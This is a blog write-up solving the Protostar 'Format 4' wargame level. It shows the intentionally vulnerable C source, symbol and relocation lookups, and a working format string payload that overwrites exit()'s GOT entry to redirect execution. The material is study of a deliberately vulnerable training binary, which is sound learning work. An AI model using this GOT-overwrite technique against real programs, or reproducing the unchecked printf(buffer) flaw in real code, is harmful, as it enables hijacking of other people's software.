Sunday, December 23, 2012

exploit-exercises Protostar: Format 4

The last format string exploitation of Protostar wargame is Format 4. The source code of the vulnerable program is provided as follow:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()
{
        printf("code execution redirected! you win\n");
        _exit(1);
}

void vuln()
{
        char buffer[512];
        fgets(buffer, sizeof(buffer), stdin);
        printf(buffer);
        exit(1);
}

int main(int argc, char **argv)
{
        vuln();
}
This time, our task is to redirect the flow of execution of the program to the
hello() function. We can use either nm or objdump to find hello()'s location.
user@protostar:/opt/protostar/bin$ nm ./format4 | grep hello
080484b4 T hello
user@protostar:/opt/protostar/bin$ objdump -d ./format4 | grep hello
080484b4 <hello>:
The hello() function is located at 0x080484b4. Overwriting vuln()'s return address on the stack doesn't seem like an option as the printf() call is followed directly by an exit() call. On the other hand, and seeing that vuln() uses the exit() library call from libc while hello() uses the exit system call, the suggested method to accomplish this challenge seems pretty obvious by now.
We start by preparing our format string exploit.

user@protostar:/opt/protostar/bin$ python -c "print 'AAAA%x.%x.%x.%x'" | ./format4
AAAA200.b7fd8420.bffff624.41414141
user@protostar:/opt/protostar/bin$ python -c "print 'AAAA%4\$x'" | ./format4
AAAA41414141
user@protostar:/opt/protostar/bin$ python -c "print 'AAAA%4\$n'" | ./format4
Segmentation fault (core dumped)
This time however, we will hijack the Global Offset Table and overwrite the reference to the exit() function. We use objdump to output the dynamic relocation entries of the program.
user@protostar:/opt/protostar/bin$ objdump -R ./format4

./format4:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
080496fc R_386_GLOB_DAT    __gmon_start__
08049730 R_386_COPY        stdin
0804970c R_386_JUMP_SLOT   __gmon_start__
08049710 R_386_JUMP_SLOT   fgets
08049714 R_386_JUMP_SLOT   __libc_start_main
08049718 R_386_JUMP_SLOT   _exit
0804971c R_386_JUMP_SLOT   printf
08049720 R_386_JUMP_SLOT   puts
08049724 R_386_JUMP_SLOT   exit
The reference to the exit() function is at 0x08049724. The exploit thus, will replace the address exit() at 0x08049724 with the address of hello() in memory which is 0x080484b4. Building the exploit for multi-byte overwriting is more detailed in the previous write-up. In essence we will write:
0x00b4  => 0x08049724
0x0484  => 0x08049725
0x0008  => 0x08049727
user@protostar:/opt/protostar/bin$ python -c 'print "\x24\x97\x04\x08\x25\x97\x04\x08\x27\x97\x04\x08%168x%4$hn%976x%5$hn%132x%6$hn"' | ./format4
$�%�'�
<snip-large-space>
code execution redirected! you win
And that is it. End of format strings exploitation challenges.

No comments:

Post a Comment